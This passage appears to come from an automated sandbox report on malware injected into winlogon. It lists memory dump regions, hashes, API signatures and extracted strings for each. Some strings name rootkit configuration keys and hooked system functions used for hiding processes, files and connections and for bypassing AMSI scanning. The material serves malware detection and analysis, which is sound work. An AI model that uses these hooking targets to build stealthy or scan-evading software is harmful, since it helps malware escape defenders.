                                                                      • Instruction ID: 4d94faa3517b8f4b4b7c4761e03c69a9c84a3d1b981e2f9ac65ab088dadb43d4
                                                                      • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction Fuzzy Hash: 66311872215BC0CAEB608F60E8943EEB7A4FB88755F44402ADA4E57B98DF79C648C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction ID: 09820439451dbd9fb6031bfa6a3cde868affece6c5833c46c5ca416d992b05db
                                                                      • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction Fuzzy Hash: BF313B72215BC0C6EB658F64E8803EEB764FB84748F44412ADE4E57B99EF78C658C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction ID: 8c3f445c0f8876fcb5e428ec2aad33fc54000e6abf4a6d6430b2ec152b93bf48
                                                                      • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction Fuzzy Hash: 79313B72215BC0CAEB608F60E8817EEB365FB84748F44402ADE4E57B98DF78C648CB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction ID: 0a1f2b7ceae55511e3414ee66d89826adcf93ba378b3c8c3605dc472ab105797
                                                                      • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction Fuzzy Hash: D6411C36224BC0CAE760CB25E8443DEB7A4FB88799F540126EE9D46B99DF38C555CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction ID: 3a26f121736f4146febb2bc5c8b44c13b298d55dc01b7a6c8325b02fe311f150
                                                                      • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction Fuzzy Hash: D6412B36224BC0C6EB60CF25E8413EEB3A5FB88758F540226EE9D46B99DF38C555CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID: !-M
                                                                      • API String ID: 1164774033-3625753649
                                                                      • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction ID: 18374baf47c53f3a207a16ef47d1b0f913938ab9ce1ebf52a422d8599eb7dced
                                                                      • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction Fuzzy Hash: 55A193327246C1CAFB219B79E8843FDBFA1ABC5794F1441369E9D2BB95DE38C4518700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1164774033-0
                                                                      • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction ID: 39bfdc35c05c2da688e871ec03857e5e59a8f41f8762b74fc6440781aae357b5
                                                                      • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction Fuzzy Hash: 82A181327286C1CDFB219B75E8843FDBBA1ABC1B95F1441369E9D27A99DE3CC4418704
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1164774033-0
                                                                      • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction ID: 963440828cc21e4634c97c586a2df5feb5c02742c35c082937db3c822ac295a7
                                                                      • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction Fuzzy Hash: 0AA194327246C2C9FB619B75E8847FDBBA1ABC17A4F144136DE9D27A99DE38C441CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction ID: c77e519a094b9b0240037eda345fc8aefee7c7299a40a0a0ee56151f6d40b724
                                                                      • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction Fuzzy Hash: 4E111836721B44CAEB00CB60E8553AD73A4FB19758F440E32DE6D867A4DF78C154C340
                                                                      APIs
                                                                        • Part of subcall function 000001E8589ED220: HeapAlloc.KERNEL32(?,?,00000000,000001E8589EC987), ref: 000001E8589ED275
                                                                        • Part of subcall function 000001E8589F0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001E8589F0EEB
                                                                      • FindFirstFileExW.KERNEL32 ref: 000001E8589EDB99
                                                                        • Part of subcall function 000001E8589ED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E8589E674A), ref: 000001E8589ED2B6
                                                                        • Part of subcall function 000001E8589ED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E8589E674A), ref: 000001E8589ED2C0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                                      • String ID: !-M
                                                                      • API String ID: 2436724071-3625753649
                                                                      • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                                      • Instruction ID: 0b219f7f44031c32ea2e79fea39e3a45199b30b026899eb8a6ed5132250adf37
                                                                      • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                                      • Instruction Fuzzy Hash: 7081A2323246C0C6EB249B2AE9403EEFB91EBC5B94F544536AE9D07B95DF38C1618700
                                                                      APIs
                                                                        • Part of subcall function 000001E8589BD220: HeapAlloc.KERNEL32(?,?,00000000,000001E8589BC987), ref: 000001E8589BD275
                                                                        • Part of subcall function 000001E8589C0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001E8589C0EEB
                                                                      • FindFirstFileExW.KERNEL32 ref: 000001E8589BDB99
                                                                        • Part of subcall function 000001E8589BD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E8589B674A), ref: 000001E8589BD2B6
                                                                        • Part of subcall function 000001E8589BD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E8589B674A), ref: 000001E8589BD2C0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2436724071-0
                                                                      • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                                      • Instruction ID: d3d71621ab098274a5083b366c7b9dc780b9f7df82d5bd74f977c4b6d14aaa4f
                                                                      • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                                      • Instruction Fuzzy Hash: 2D819032329AC0CAEB24DB62E5413EEFB91EBC5B95F544136AE9D17B95DE3CC0418704
                                                                      APIs
                                                                        • Part of subcall function 000001E85898D220: HeapAlloc.KERNEL32(?,?,00000000,000001E85898C987), ref: 000001E85898D275
                                                                        • Part of subcall function 000001E858990EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001E858990EEB
                                                                      • FindFirstFileExW.KERNEL32 ref: 000001E85898DB99
                                                                        • Part of subcall function 000001E85898D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E85898674A), ref: 000001E85898D2B6
                                                                        • Part of subcall function 000001E85898D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E85898674A), ref: 000001E85898D2C0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2436724071-0
                                                                      • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                                      • Instruction ID: 04adc9b0a6a2696a2b873d994df342b5533526a61dde9e8bfff30a87b450d365
                                                                      • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                                      • Instruction Fuzzy Hash: A781A1323246C2C6EB20DB66E5417EEF7A1EBC5BA4F544136AEAD47B95DF38C0418B00
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                                      • Instruction ID: fb5b7aa0220fcb614365f69b7198efa8676ca908a684f431a8bf72c4f8d97fc7
                                                                      • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                                      • Instruction Fuzzy Hash: 671130B16345D0C7E7A99F29D4513ADB790FB4A384F84803ADC4EC7A94DF2D84918F04
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 2135414181-3572789727
                                                                      • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction ID: 0174a383f8a82be9dde6690383532ac3e7002ee8ddac20e19dbe65dd89c72992
                                                                      • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction Fuzzy Hash: F371E936224A90CAEB10EF65E8947DDB7A4FF88B89F801122DE4E97B68DE35C544C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 2135414181-3572789727
                                                                      • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction ID: 64c81fe0a7cd359e6481c4651bad97baf2ab0a275262f099def3fe385e6f62d7
                                                                      • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction Fuzzy Hash: 2F711A36720A90C6EB11AF65E8906DDB7A4FF88B89F445132DE4E57B68EF38C554C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                                      • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                      • API String ID: 1735320900-4225371247
                                                                      • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction ID: 3890a7050a7f7b596aa9a3c73e910d8044593bced606347f1359c2de54b00974
                                                                      • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction Fuzzy Hash: 1A517C71234ACAE9EB14EBA4EC457DCFB20FF4034AF8049339C0D42566DE79825AC788
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                                      • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                      • API String ID: 1735320900-4225371247
                                                                      • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction ID: 0679d6ce0c791feeed0f6c75edd0c596b38c86b882ae33b40327a4222458b5ed
                                                                      • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction Fuzzy Hash: 395176B0170ADAE6EB0AEBA4EC417DCFB20AF40748F804533AD1D06565DE78C16AC386
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction ID: c26919a39b6f19c3673957ef411dbc7f76c1d98ffb3b278101d1cf87e9ab1a55
                                                                      • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction Fuzzy Hash: 70512A32224B84DAE724DF62E44839EBBA1FB89F99F444136DE4E47758EF39C0498700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
